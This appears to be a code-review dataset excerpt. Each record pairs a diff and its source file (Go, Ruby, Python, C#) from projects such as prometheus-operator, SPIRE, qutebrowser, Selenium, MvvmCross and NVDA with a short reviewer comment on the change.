} } if a.Spec.PodMetadata.Annotations != nil { for k, v := range a.Spec.PodMetadata.Annotations { podAnnotations[k] = v } } } for k, v := range podSelectorLabels { podLabels[k] = v } var clusterPeerDomain string if config.ClusterDomain != "" { clusterPeerDomain = fmt.Sprintf("%s.%s.svc.%s.", governingServiceName, a.Namespace, config.ClusterDomain) } else { // The default DNS search path is .svc.<cluster domain> clusterPeerDomain = governingServiceName } for i := int32(0); i < *a.Spec.Replicas; i++ { amArgs = append(amArgs, fmt.Sprintf("--cluster.peer=%s-%d.%s:9094", prefixedName(a.Name), i, clusterPeerDomain)) } for _, peer := range a.Spec.AdditionalPeers { amArgs = append(amArgs, fmt.Sprintf("--cluster.peer=%s", peer)) } ports := []v1.ContainerPort{ { Name: "mesh-tcp", ContainerPort: 9094, Protocol: v1.ProtocolTCP, }, { Name: "mesh-udp", ContainerPort: 9094, Protocol: v1.ProtocolUDP, }, } if !a.Spec.ListenLocal { ports = append([]v1.ContainerPort{ { Name: a.Spec.PortName, ContainerPort: 9093, Protocol: v1.ProtocolTCP, }, }, ports...) } // Adjust Alertmanager command line args to specified AM version // // Alertmanager versions < v0.15.0 are only supported on a best effort basis // starting with Prometheus Operator v0.30.0. switch version.Major { case 0: if version.Minor < 15 { for i := range amArgs { // below Alertmanager v0.15.0 peer address port specification is not necessary if strings.Contains(amArgs[i], "--cluster.peer") { amArgs[i] = strings.TrimSuffix(amArgs[i], ":9094") } // below Alertmanager v0.15.0 high availability flags are prefixed with 'mesh' instead of 'cluster' amArgs[i] = strings.Replace(amArgs[i], "--cluster.", "--mesh.", 1) } } else { // reconnect-timeout was added in 0.15 (https://github.com/prometheus/alertmanager/pull/1384) // Override default 6h value to allow AlertManager cluster to // quickly remove a cluster member after its pod restarted or during a // regular rolling update. amArgs = append(amArgs, "--cluster.reconnect-timeout=5m") } if version.Minor < 13 { for i := range amArgs { // below Alertmanager v0.13.0 all flags are with single dash. 
amArgs[i] = strings.Replace(amArgs[i], "--", "-", 1) } } if version.Minor < 7 { // below Alertmanager v0.7.0 the flag 'web.route-prefix' does not exist amArgs = filter(amArgs, func(s string) bool { return !strings.Contains(s, "web.route-prefix") }) } default: return nil, errors.Errorf("unsupported Alertmanager major version %s", version) } volumes := []v1.Volume{ { Name: "config-volume", VolumeSource: v1.VolumeSource{ Secret: &v1.SecretVolumeSource{ SecretName: a.Spec.ConfigSecret, }, }, }, } volName := volumeName(a.Name) if a.Spec.Storage != nil { if a.Spec.Storage.VolumeClaimTemplate.Name != "" { volName = a.Spec.Storage.VolumeClaimTemplate.Name } } amVolumeMounts := []v1.VolumeMount{ { Name: "config-volume", MountPath: alertmanagerConfDir, }, { Name: volName, MountPath: alertmanagerStorageDir, SubPath: subPathForStorage(a.Spec.Storage), }, } reloadWatchDirs := []string{alertmanagerConfDir} configReloaderVolumeMounts := []v1.VolumeMount{ { Name: "config-volume", MountPath: alertmanagerConfDir, ReadOnly: true, }, } for _, s := range a.Spec.Secrets { volumes = append(volumes, v1.Volume{ Name: k8sutil.SanitizeVolumeName("secret-" + s), VolumeSource: v1.VolumeSource{ Secret: &v1.SecretVolumeSource{ SecretName: s, }, }, }) mountPath := secretsDir + s mount := v1.VolumeMount{ Name: k8sutil.SanitizeVolumeName("secret-" + s), ReadOnly: true, MountPath: mountPath, } amVolumeMounts = append(amVolumeMounts, mount) configReloaderVolumeMounts = append(configReloaderVolumeMounts, mount) reloadWatchDirs = append(reloadWatchDirs, mountPath) } for _, c := range a.Spec.ConfigMaps { volumes = append(volumes, v1.Volume{ Name: k8sutil.SanitizeVolumeName("configmap-" + c), VolumeSource: v1.VolumeSource{ ConfigMap: &v1.ConfigMapVolumeSource{ LocalObjectReference: v1.LocalObjectReference{ Name: c, }, }, }, }) mountPath := configmapsDir + c mount := v1.VolumeMount{ Name: k8sutil.SanitizeVolumeName("configmap-" + c), ReadOnly: true, MountPath: mountPath, } amVolumeMounts = append(amVolumeMounts, mount) configReloaderVolumeMounts = append(configReloaderVolumeMounts, mount) reloadWatchDirs = append(reloadWatchDirs, mountPath) } amVolumeMounts = append(amVolumeMounts, a.Spec.VolumeMounts...) 
resources := v1.ResourceRequirements{Limits: v1.ResourceList{}} if config.ConfigReloaderCPU != "0" { resources.Limits[v1.ResourceCPU] = resource.MustParse(config.ConfigReloaderCPU) } if config.ConfigReloaderMemory != "0" { resources.Limits[v1.ResourceMemory] = resource.MustParse(config.ConfigReloaderMemory) } terminationGracePeriod := int64(120) finalSelectorLabels := config.Labels.Merge(podSelectorLabels) finalLabels := config.Labels.Merge(podLabels) configReloaderArgs := []string{ fmt.Sprintf("-webhook-url=%s", localReloadURL), } for _, reloadWatchDir := range reloadWatchDirs { configReloaderArgs = append(configReloaderArgs, fmt.Sprintf("-volume-dir=%s", reloadWatchDir)) } defaultContainers := []v1.Container{ { Args: amArgs, Name: "alertmanager", Image: amImagePath, Ports: ports, VolumeMounts: amVolumeMounts, LivenessProbe: livenessProbe, ReadinessProbe: readinessProbe, Resources: a.Spec.Resources, Env: []v1.EnvVar{ { // Necessary for '--cluster.listen-address' flag Name: "POD_IP", ValueFrom: &v1.EnvVarSource{ FieldRef: &v1.ObjectFieldSelector{ FieldPath: "status.podIP", }, }, }, }, TerminationMessagePolicy: v1.TerminationMessageFallbackToLogsOnError, }, { Name: "config-reloader", Image: config.ConfigReloaderImage, Args: configReloaderArgs, VolumeMounts: configReloaderVolumeMounts, Resources: resources, TerminationMessagePolicy: v1.TerminationMessageFallbackToLogsOnError, }, } containers, err := k8sutil.MergePatchContainers(defaultContainers, a.Spec.Containers) if err != nil { return nil, errors.Wrap(err, "failed to merge containers spec") } // PodManagementPolicy is set to Parallel to mitigate issues in kubernetes: https://github.com/kubernetes/kubernetes/issues/60164 // This is also mentioned as one of limitations of StatefulSets: https://kubernetes.io/docs/concepts/workloads/controllers/statefulset/#limitations return &appsv1.StatefulSetSpec{ ServiceName: governingServiceName, Replicas: a.Spec.Replicas, PodManagementPolicy: appsv1.ParallelPodManagement, UpdateStrategy: appsv1.StatefulSetUpdateStrategy{ Type: appsv1.RollingUpdateStatefulSetStrategyType, }, Selector: &metav1.LabelSelector{ MatchLabels: finalSelectorLabels, }, Template: v1.PodTemplateSpec{ ObjectMeta: metav1.ObjectMeta{ Labels: finalLabels, Annotations: podAnnotations, }, Spec: v1.PodSpec{ NodeSelector: a.Spec.NodeSelector, PriorityClassName: a.Spec.PriorityClassName, TerminationGracePeriodSeconds: &terminationGracePeriod, InitContainers: a.Spec.InitContainers, Containers: containers, Volumes: volumes, ServiceAccountName: a.Spec.ServiceAccountName, SecurityContext: a.Spec.SecurityContext, Tolerations: a.Spec.Tolerations, Affinity: a.Spec.Affinity, }, }, }, nil } func configSecretName(name string) string { return prefixedName(name) } func volumeName(name string) string { return fmt.Sprintf("%s-db", prefixedName(name)) } func prefixedName(name string) string { return fmt.Sprintf("alertmanager-%s", name) } func subPathForStorage(s *monitoringv1.StorageSpec) string { if s == nil { return "" } if s.DisableMountSubPath { return "" } return "alertmanager-db" } func filter(strings []string, f func(string) bool) []string { filteredStrings := make([]string, 0) for _, s := range strings { if f(s) { filteredStrings = append(filteredStrings, s) } } return filteredStrings }
1
14,927
This service is global per namespace, not per Alertmanager/Prometheus/ThanosRuler instance, so this approach won't work. But maybe I'm missing something; can you describe your use case here?
prometheus-operator-prometheus-operator
go
@@ -32,6 +32,7 @@ type AttestedNode struct { ExpiresAt time.Time `gorm:"index"` NewSerialNumber string NewExpiresAt *time.Time + CanReattest bool `gorm:"default:false"` Selectors []*NodeSelector }
1
package sqlstore import ( "time" ) // Model is used as a base for other models. Similar to gorm.Model without `DeletedAt`. // We don't want soft-delete support. type Model struct { ID uint `gorm:"primary_key"` CreatedAt time.Time UpdatedAt time.Time } // Bundle holds a trust bundle. type Bundle struct { Model TrustDomain string `gorm:"not null;unique_index"` Data []byte `gorm:"size:16777215"` // make MySQL to use MEDIUMBLOB (max 16MB) - doesn't affect PostgreSQL/SQLite FederatedEntries []RegisteredEntry `gorm:"many2many:federated_registration_entries;"` } // AttestedNode holds an attested node (agent) type AttestedNode struct { Model SpiffeID string `gorm:"unique_index"` DataType string SerialNumber string ExpiresAt time.Time `gorm:"index"` NewSerialNumber string NewExpiresAt *time.Time Selectors []*NodeSelector } // TableName gets table name of AttestedNode func (AttestedNode) TableName() string { return "attested_node_entries" } type V3AttestedNode struct { Model SpiffeID string `gorm:"unique_index"` DataType string SerialNumber string ExpiresAt time.Time } func (V3AttestedNode) TableName() string { return "attested_node_entries" } // NodeSelector holds a node selector by spiffe ID type NodeSelector struct { Model SpiffeID string `gorm:"unique_index:idx_node_resolver_map"` Type string `gorm:"unique_index:idx_node_resolver_map"` Value string `gorm:"unique_index:idx_node_resolver_map"` } // TableName gets table name of NodeSelector func (NodeSelector) TableName() string { return "node_resolver_map_entries" } // RegisteredEntry holds a registered entity entry type RegisteredEntry struct { Model EntryID string `gorm:"unique_index"` SpiffeID string `gorm:"index"` ParentID string `gorm:"index"` // TTL of identities derived from this entry TTL int32 Selectors []Selector FederatesWith []Bundle `gorm:"many2many:federated_registration_entries;"` Admin bool Downstream bool // (optional) expiry of this entry Expiry int64 `gorm:"index"` // (optional) DNS entries DNSList []DNSName // RevisionNumber is a counter that is incremented when the entry is // updated. RevisionNumber int64 // StoreSvid determines if the issued SVID is exportable to a store StoreSvid bool } // JoinToken holds a join token type JoinToken struct { Model Token string `gorm:"unique_index"` Expiry int64 } type Selector struct { Model RegisteredEntryID uint `gorm:"unique_index:idx_selector_entry"` Type string `gorm:"unique_index:idx_selector_entry;index:idx_selectors_type_value"` Value string `gorm:"unique_index:idx_selector_entry;index:idx_selectors_type_value"` } // DNSName holds a DNS for a registration entry type DNSName struct { Model RegisteredEntryID uint `gorm:"unique_index:idx_dns_entry"` Value string `gorm:"unique_index:idx_dns_entry"` } // TableName gets table name for DNS entries func (DNSName) TableName() string { return "dns_names" } // FederatedTrustDomain holds federated trust domains. // It has the information needed to get updated bundles of the // federated trust domain from a SPIFFE bundle endpoint server. type FederatedTrustDomain struct { Model // TrustDomain is the trust domain name (e.g., "example.org") to federate with. TrustDomain string `gorm:"not null;unique_index"` // BundleEndpointURL is the URL of the SPIFFE bundle endpoint that provides the trust // bundle to federate with. BundleEndpointURL string // BundleEndpointProfile is the endpoint profile type. 
BundleEndpointProfile string // EndpointSPIFFEID specifies the expected SPIFFE ID of the // SPIFFE bundle endpoint server when BundleEndpointProfile // is "https_spiffe" EndpointSPIFFEID string // Implicit indicates wether the trust domain automatically federates with // all registration entries by default or not. Implicit bool } // TableName gets table name of FederatedTrustDomain func (FederatedTrustDomain) TableName() string { return "federated_trust_domains" } // Migration holds database schema version number, and // the SPIRE Code version number type Migration struct { Model // Database version Version int // SPIRE Code versioning CodeVersion string }
1
18,246
Do we need this default? Since we aren't using a sql.NullBool or *bool, an unset column will be interpreted as `false` already... We don't set a default on our other bool fields (e.g. entry admin and downstream columns).
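A tiny runnable illustration of the point above, with hypothetical field names rather than the actual SPIRE schema: a plain `bool` column needs no `gorm:"default:false"` tag because the Go zero value already reads back as `false`, matching the style of the other bool fields.

```go
package main

import "fmt"

// attestedNode mirrors the suggested shape: a plain bool with no default tag.
// (Names are illustrative, not the actual SPIRE model.)
type attestedNode struct {
	SpiffeID    string `gorm:"unique_index"`
	CanReattest bool   // zero value is false, so `default:false` adds nothing
}

func main() {
	var n attestedNode
	fmt.Printf("CanReattest defaults to %v\n", n.CanReattest)
}
```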
spiffe-spire
go
@@ -39,6 +39,18 @@ module ExportsHelper "<strong>#{prefix}</strong> #{attribution.join(', ')}" end + def download_plan_page_title(plan, phase, hash) + # If there is more than one phase show the plan title and phase title + return hash[:phases].many? ? "#{plan.title} - #{phase[:title]}" : plan.title + end + + def display_section?(customization, section, show_custom_sections) + display = !customization + display ||= customization && !section[:modifiable] + display ||= customization && section[:modifiable] && show_custom_sections + return display + end + private def get_margin_value_for_side(side)
1
# frozen_string_literal: true module ExportsHelper PAGE_MARGINS = { top: "5", bottom: "10", left: "12", right: "12", } def font_face @formatting[:font_face].presence || "Arial, Helvetica, Sans-Serif" end def font_size @formatting[:font_size].presence || "12" end def margin_top get_margin_value_for_side(:top) end def margin_bottom get_margin_value_for_side(:bottom) end def margin_left get_margin_value_for_side(:left) end def margin_right get_margin_value_for_side(:right) end def plan_attribution(attribution) attribution = Array(attribution) prefix = attribution.many? ? _("Creators:") : _("Creator:") "<strong>#{prefix}</strong> #{attribution.join(', ')}" end private def get_margin_value_for_side(side) side = side.to_sym if @formatting.dig(:margin, side).is_a?(Integer) @formatting[:margin][side] * 4 else @formatting.dig(:margin, side).presence || PAGE_MARGINS[side] end end end
1
18,314
Thanks for moving these over. It makes more sense for them to be in the exports_helper.
DMPRoadmap-roadmap
rb
@@ -29,8 +29,9 @@ from qutebrowser.utils import message from qutebrowser.config import config from qutebrowser.keyinput import keyparser from qutebrowser.utils import usertypes, log, objreg, utils +from qutebrowser.config.parsers import keyconf - + STARTCHARS = ":/?" LastPress = usertypes.enum('LastPress', ['none', 'filtertext', 'keystring'])
1
# vim: ft=python fileencoding=utf-8 sts=4 sw=4 et: # Copyright 2014-2016 Florian Bruhin (The Compiler) <[email protected]> # # This file is part of qutebrowser. # # qutebrowser is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # qutebrowser is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with qutebrowser. If not, see <http://www.gnu.org/licenses/>. """KeyChainParser for "hint" and "normal" modes. Module attributes: STARTCHARS: Possible chars for starting a commandline input. """ from PyQt5.QtCore import pyqtSlot, Qt from qutebrowser.utils import message from qutebrowser.config import config from qutebrowser.keyinput import keyparser from qutebrowser.utils import usertypes, log, objreg, utils STARTCHARS = ":/?" LastPress = usertypes.enum('LastPress', ['none', 'filtertext', 'keystring']) class NormalKeyParser(keyparser.CommandKeyParser): """KeyParser for normal mode with added STARTCHARS detection and more. Attributes: _partial_timer: Timer to clear partial keypresses. """ def __init__(self, win_id, parent=None): super().__init__(win_id, parent, supports_count=True, supports_chains=True) self.read_config('normal') self._partial_timer = usertypes.Timer(self, 'partial-match') self._partial_timer.setSingleShot(True) self._inhibited = False self._inhibited_timer = usertypes.Timer(self, 'normal-inhibited') self._inhibited_timer.setSingleShot(True) def __repr__(self): return utils.get_repr(self) def _handle_single_key(self, e): """Override _handle_single_key to abort if the key is a startchar. Args: e: the KeyPressEvent from Qt. Return: A self.Match member. 
""" txt = e.text().strip() if self._inhibited: self._debug_log("Ignoring key '{}', because the normal mode is " "currently inhibited.".format(txt)) return self.Match.none if not self._keystring and any(txt == c for c in STARTCHARS): message.set_cmd_text(self._win_id, txt) return self.Match.definitive match = super()._handle_single_key(e) if match == self.Match.partial: timeout = config.get('input', 'partial-timeout') if timeout != 0: self._partial_timer.setInterval(timeout) self._partial_timer.timeout.connect(self._clear_partial_match) self._partial_timer.start() return match def set_inhibited_timeout(self, timeout): if timeout != 0: self._debug_log("Inhibiting the normal mode for {}ms.".format( timeout)) self._inhibited = True self._inhibited_timer.setInterval(timeout) self._inhibited_timer.timeout.connect(self._clear_inhibited) self._inhibited_timer.start() @pyqtSlot() def _clear_partial_match(self): """Clear a partial keystring after a timeout.""" self._debug_log("Clearing partial keystring {}".format( self._keystring)) self._keystring = '' self.keystring_updated.emit(self._keystring) @pyqtSlot() def _clear_inhibited(self): """Reset inhibition state after a timeout.""" self._debug_log("Releasing inhibition state of normal mode.") self._inhibited = False @pyqtSlot() def _stop_timers(self): super()._stop_timers() self._partial_timer.stop() try: self._partial_timer.timeout.disconnect(self._clear_partial_match) except TypeError: # no connections pass self._inhibited_timer.stop() try: self._inhibited_timer.timeout.disconnect(self._clear_inhibited) except TypeError: # no connections pass class PromptKeyParser(keyparser.CommandKeyParser): """KeyParser for yes/no prompts.""" def __init__(self, win_id, parent=None): super().__init__(win_id, parent, supports_count=False, supports_chains=True) # We don't want an extra section for this in the config, so we just # abuse the prompt section. self.read_config('prompt') def __repr__(self): return utils.get_repr(self) class HintKeyParser(keyparser.CommandKeyParser): """KeyChainParser for hints. Attributes: _filtertext: The text to filter with. _last_press: The nature of the last keypress, a LastPress member. """ def __init__(self, win_id, parent=None): super().__init__(win_id, parent, supports_count=False, supports_chains=True) self._filtertext = '' self._last_press = LastPress.none self.read_config('hint') self.keystring_updated.connect(self.on_keystring_updated) def _handle_special_key(self, e): """Override _handle_special_key to handle string filtering. Return True if the keypress has been handled, and False if not. Args: e: the KeyPressEvent from Qt. Return: True if event has been handled, False otherwise. """ log.keyboard.debug("Got special key 0x{:x} text {}".format( e.key(), e.text())) hintmanager = objreg.get('hintmanager', scope='tab', window=self._win_id, tab='current') if e.key() == Qt.Key_Backspace: log.keyboard.debug("Got backspace, mode {}, filtertext '{}', " "keystring '{}'".format(self._last_press, self._filtertext, self._keystring)) if self._last_press == LastPress.filtertext and self._filtertext: self._filtertext = self._filtertext[:-1] hintmanager.filter_hints(self._filtertext) return True elif self._last_press == LastPress.keystring and self._keystring: self._keystring = self._keystring[:-1] self.keystring_updated.emit(self._keystring) if not self._keystring and self._filtertext: # Switch back to hint filtering mode (this can happen only # in numeric mode after the number has been deleted). 
hintmanager.filter_hints(self._filtertext) self._last_press = LastPress.filtertext return True else: return super()._handle_special_key(e) elif hintmanager.current_mode() != 'number': return super()._handle_special_key(e) elif not e.text(): return super()._handle_special_key(e) else: self._filtertext += e.text() hintmanager.filter_hints(self._filtertext) self._last_press = LastPress.filtertext return True def handle(self, e): """Handle a new keypress and call the respective handlers. Args: e: the KeyPressEvent from Qt Returns: True if the match has been handled, False otherwise. """ match = self._handle_single_key(e) if match == self.Match.partial: self.keystring_updated.emit(self._keystring) self._last_press = LastPress.keystring return True elif match == self.Match.definitive: self._last_press = LastPress.none return True elif match == self.Match.other: pass elif match == self.Match.none: # We couldn't find a keychain so we check if it's a special key. return self._handle_special_key(e) else: raise ValueError("Got invalid match type {}!".format(match)) def execute(self, cmdstr, keytype, count=None): """Handle a completed keychain.""" if not isinstance(keytype, self.Type): raise TypeError("Type {} is no Type member!".format(keytype)) if keytype == self.Type.chain: hintmanager = objreg.get('hintmanager', scope='tab', window=self._win_id, tab='current') hintmanager.fire(cmdstr) else: # execute as command super().execute(cmdstr, keytype, count) def update_bindings(self, strings, preserve_filter=False): """Update bindings when the hint strings changed. Args: strings: A list of hint strings. preserve_filter: Whether to keep the current value of `self._filtertext`. """ self.bindings = {s: s for s in strings} if not preserve_filter: self._filtertext = '' @pyqtSlot(str) def on_keystring_updated(self, keystr): """Update hintmanager when the keystring was updated.""" hintmanager = objreg.get('hintmanager', scope='tab', window=self._win_id, tab='current') hintmanager.handle_partial_key(keystr) class CaretKeyParser(keyparser.CommandKeyParser): """KeyParser for caret mode.""" passthrough = True def __init__(self, win_id, parent=None): super().__init__(win_id, parent, supports_count=True, supports_chains=True) self.read_config('caret') class MarkKeyParser(keyparser.BaseKeyParser): """KeyParser for set_mark and jump_mark mode. Attributes: _mode: Either KeyMode.set_mark or KeyMode.jump_mark. """ def __init__(self, win_id, mode, parent=None): super().__init__(win_id, parent, supports_count=False, supports_chains=False) self._mode = mode def handle(self, e): """Override handle to always match the next key and create a mark. Args: e: the KeyPressEvent from Qt. Return: True if event has been handled, False otherwise. """ if utils.keyevent_to_string(e) is None: # this is a modifier key, let it pass and keep going return False key = e.text() tabbed_browser = objreg.get('tabbed-browser', scope='window', window=self._win_id) if self._mode == usertypes.KeyMode.set_mark: tabbed_browser.set_mark(key) elif self._mode == usertypes.KeyMode.jump_mark: tabbed_browser.jump_mark(key) else: raise ValueError("{} is not a valid mark mode".format(self._mode)) self.request_leave.emit(self._mode, "valid mark key") return True @pyqtSlot(str) def on_keyconfig_changed(self, mode): """MarkKeyParser has no config section (no bindable keys).""" pass def execute(self, cmdstr, _keytype, count=None): """Should never be called on MarkKeyParser.""" assert False
1
16,083
That import isn't needed anymore.
qutebrowser-qutebrowser
py
@@ -237,6 +237,8 @@ class WebDriver(RemoteWebDriver): Returns identifier of installed addon. This identifier can later be used to uninstall addon. + :param path: Full path to the addon that will be installed. + :Usage: driver.install_addon('firebug.xpi') """
1
# Licensed to the Software Freedom Conservancy (SFC) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The SFC licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. try: import http.client as http_client except ImportError: import httplib as http_client try: basestring except NameError: # Python 3.x basestring = str import shutil import socket import sys from contextlib import contextmanager from selenium.webdriver.common.desired_capabilities import DesiredCapabilities from selenium.webdriver.remote.webdriver import WebDriver as RemoteWebDriver from .extension_connection import ExtensionConnection from .firefox_binary import FirefoxBinary from .firefox_profile import FirefoxProfile from .options import Options from .remote_connection import FirefoxRemoteConnection from .service import Service from .webelement import FirefoxWebElement class WebDriver(RemoteWebDriver): # There is no native event support on Mac NATIVE_EVENTS_ALLOWED = sys.platform != "darwin" CONTEXT_CHROME = "chrome" CONTEXT_CONTENT = "content" _web_element_cls = FirefoxWebElement def __init__(self, firefox_profile=None, firefox_binary=None, timeout=30, capabilities=None, proxy=None, executable_path="geckodriver", firefox_options=None, log_path="geckodriver.log"): """Starts a new local session of Firefox. Based on the combination and specificity of the various keyword arguments, a capabilities dictionary will be constructed that is passed to the remote end. The keyword arguments given to this constructor are helpers to more easily allow Firefox WebDriver sessions to be customised with different options. They are mapped on to a capabilities dictionary that is passed on to the remote end. As some of the options, such as `firefox_profile` and `firefox_options.profile` are mutually exclusive, precedence is given from how specific the setting is. `capabilities` is the least specific keyword argument, followed by `firefox_options`, followed by `firefox_binary` and `firefox_profile`. In practice this means that if `firefox_profile` and `firefox_options.profile` are both set, the selected profile instance will always come from the most specific variable. In this case that would be `firefox_profile`. This will result in `firefox_options.profile` to be ignored because it is considered a less specific setting than the top-level `firefox_profile` keyword argument. Similarily, if you had specified a `capabilities["firefoxOptions"]["profile"]` Base64 string, this would rank below `firefox_options.profile`. :param firefox_profile: Instance of ``FirefoxProfile`` object or a string. If undefined, a fresh profile will be created in a temporary location on the system. :param firefox_binary: Instance of ``FirefoxBinary`` or full path to the Firefox binary. If undefined, the system default Firefox installation will be used. :param timeout: Time to wait for Firefox to launch when using the extension connection. 
:param capabilities: Dictionary of desired capabilities. :param proxy: The proxy settings to us when communicating with Firefox via the extension connection. :param executable_path: Full path to override which geckodriver binary to use for Firefox 47.0.1 and greater, which defaults to picking up the binary from the system path. :param firefox_options: Instance of ``options.Options``. :param log_path: Where to log information from the driver. """ self.binary = None self.profile = None self.service = None if capabilities is None: capabilities = DesiredCapabilities.FIREFOX.copy() if firefox_options is None: firefox_options = Options() capabilities = dict(capabilities) if capabilities.get("binary"): self.binary = capabilities["binary"] # firefox_options overrides capabilities if firefox_options is not None: if firefox_options.binary is not None: self.binary = firefox_options.binary if firefox_options.profile is not None: self.profile = firefox_options.profile # firefox_binary and firefox_profile # override firefox_options if firefox_binary is not None: if isinstance(firefox_binary, basestring): firefox_binary = FirefoxBinary(firefox_binary) self.binary = firefox_binary firefox_options.binary = firefox_binary if firefox_profile is not None: if isinstance(firefox_profile, basestring): firefox_profile = FirefoxProfile(firefox_profile) self.profile = firefox_profile firefox_options.profile = firefox_profile # W3C remote # TODO(ato): Perform conformance negotiation if capabilities.get("marionette"): capabilities.pop("marionette") self.service = Service(executable_path, log_path=log_path) self.service.start() capabilities.update(firefox_options.to_capabilities()) executor = FirefoxRemoteConnection( remote_server_addr=self.service.service_url) RemoteWebDriver.__init__( self, command_executor=executor, desired_capabilities=capabilities, keep_alive=True) # Selenium remote else: if self.binary is None: self.binary = FirefoxBinary() if self.profile is None: self.profile = FirefoxProfile() # disable native events if globally disabled self.profile.native_events_enabled = ( self.NATIVE_EVENTS_ALLOWED and self.profile.native_events_enabled) if proxy is not None: proxy.add_to_capabilities(capabilities) executor = ExtensionConnection("127.0.0.1", self.profile, self.binary, timeout) RemoteWebDriver.__init__( self, command_executor=executor, desired_capabilities=capabilities, keep_alive=True) self._is_remote = False def quit(self): """Quits the driver and close every associated window.""" try: RemoteWebDriver.quit(self) except (http_client.BadStatusLine, socket.error): # Happens if Firefox shutsdown before we've read the response from # the socket. pass if self.w3c: self.service.stop() else: self.binary.kill() if self.profile is not None: try: shutil.rmtree(self.profile.path) if self.profile.tempfolder is not None: shutil.rmtree(self.profile.tempfolder) except Exception as e: print(str(e)) @property def firefox_profile(self): return self.profile # Extension commands: def set_context(self, context): self.execute("SET_CONTEXT", {"context": context}) @contextmanager def context(self, context): """Sets the context that Selenium commands are running in using a `with` statement. The state of the context on the server is saved before entering the block, and restored upon exiting it. :param context: Context, may be one of the class properties `CONTEXT_CHROME` or `CONTEXT_CONTENT`. Usage example:: with selenium.context(selenium.CONTEXT_CHROME): # chrome scope ... do stuff ... 
""" initial_context = self.execute('GET_CONTEXT').pop('value') self.set_context(context) try: yield finally: self.set_context(initial_context) def install_addon(self, path, temporary=None): """ Installs Firefox addon. Returns identifier of installed addon. This identifier can later be used to uninstall addon. :Usage: driver.install_addon('firebug.xpi') """ payload = {"path": path} if temporary is not None: payload["temporary"] = temporary return self.execute("INSTALL_ADDON", payload)["value"] def uninstall_addon(self, identifier): """ Uninstalls Firefox addon using its identifier. :Usage: driver.uninstall_addon('[email protected]') """ self.execute("UNINSTALL_ADDON", {"id": identifier})
1
14,956
Can you update the `Usage` to be an absolute path as well? Something like `/path/to/firebug.xpi` (a usage sketch follows this record).
SeleniumHQ-selenium
py
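
The review comment on this Selenium record asks for the `install_addon` Usage line to show an absolute path. The snippet below is only a small usage sketch of that suggestion against the public Firefox WebDriver API shown above; `firebug.xpi` is a placeholder file name, and a local Firefox plus geckodriver on the PATH are assumed.

import os

from selenium import webdriver

# Start a local Firefox session (assumes geckodriver is on the PATH).
driver = webdriver.Firefox()

# Passing an absolute path, e.g. /path/to/firebug.xpi, is what the reviewer
# wants the docstring's Usage example to demonstrate; os.path.abspath makes
# the path explicit even when the .xpi sits in the current directory.
addon_id = driver.install_addon(os.path.abspath("firebug.xpi"))

# The returned identifier can later be used to remove the add-on again.
driver.uninstall_addon(addon_id)
driver.quit()
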
@@ -2,17 +2,13 @@
 // The .NET Foundation licenses this file to you under the MS-PL license.
 // See the LICENSE file in the project root for more information.
-
-using MvvmCross.Plugins;
-
 namespace MvvmCross.Plugin.Accelerometer.Platform.Uap
 {
-    public class Plugin
-        : IMvxPlugin
+    public class Plugin : IMvxPlugin
     {
         public void Load()
         {
-            Mvx.RegisterSingleton<IMvxAccelerometer>(new MvxWindowsCommonAccelerometer());
+            Mvx.RegisterSingleton<IMvxAccelerometer>(new MvxWindowsAccelerometer());
         }
     }
 }
1
// Licensed to the .NET Foundation under one or more agreements.
// The .NET Foundation licenses this file to you under the MS-PL license.
// See the LICENSE file in the project root for more information.

using MvvmCross.Plugins;

namespace MvvmCross.Plugin.Accelerometer.Platform.Uap
{
    public class Plugin
        : IMvxPlugin
    {
        public void Load()
        {
            Mvx.RegisterSingleton<IMvxAccelerometer>(new MvxWindowsCommonAccelerometer());
        }
    }
}
1
13,752
This class is missing the `MvxPlugin` attribute
MvvmCross-MvvmCross
.cs
@@ -596,6 +596,8 @@ def initialize():
 	if mainFrame:
 		raise RuntimeError("GUI already initialized")
 	mainFrame = MainFrame()
+	wxLang = core.getWxLang(languageHandler.getLanguage())
+	mainFrame.SetLayoutDirection(wxLang.LayoutDirection)
 	wx.GetApp().SetTopWindow(mainFrame)
 	# In wxPython >= 4.1,
 	# wx.CallAfter no longer executes callbacks while NVDA's main thread is within apopup menu or message box.
1
# -*- coding: UTF-8 -*- # A part of NonVisual Desktop Access (NVDA) # Copyright (C) 2006-2020 NV Access Limited, Peter Vágner, Aleksey Sadovoy, Mesar Hameed, Joseph Lee, # Thomas Stivers, Babbage B.V. # This file is covered by the GNU General Public License. # See the file COPYING for more details. from .contextHelp import ( # several other submodules depend on ContextHelpMixin # ensure early that it can be imported successfully. ContextHelpMixin as _ContextHelpMixin, # don't expose from gui, import submodule directly. ) import time import os import sys import threading import codecs import ctypes import weakref import wx import wx.adv import globalVars import tones import ui from logHandler import log import config import versionInfo import addonAPIVersion import speech import queueHandler import core from . import guiHelper from .settingsDialogs import * from .inputGestures import InputGesturesDialog import speechDictHandler import languageHandler import keyboardHandler from . import logViewer import speechViewer import winUser import api from . import guiHelper import winVersion try: import updateCheck except RuntimeError: updateCheck = None ### Constants NVDA_PATH = globalVars.appDir ICON_PATH=os.path.join(NVDA_PATH, "images", "nvda.ico") DONATE_URL = "http://www.nvaccess.org/donate/" ### Globals mainFrame = None isInMessageBox = False def getDocFilePath(fileName, localized=True): if not getDocFilePath.rootPath: if hasattr(sys, "frozen"): getDocFilePath.rootPath = os.path.join(NVDA_PATH, "documentation") else: getDocFilePath.rootPath = os.path.join(NVDA_PATH, "..", "user_docs") if localized: lang = languageHandler.getLanguage() tryLangs = [lang] if "_" in lang: # This locale has a sub-locale, but documentation might not exist for the sub-locale, so try stripping it. tryLangs.append(lang.split("_")[0]) # If all else fails, use English. tryLangs.append("en") fileName, fileExt = os.path.splitext(fileName) for tryLang in tryLangs: tryDir = os.path.join(getDocFilePath.rootPath, tryLang) if not os.path.isdir(tryDir): continue # 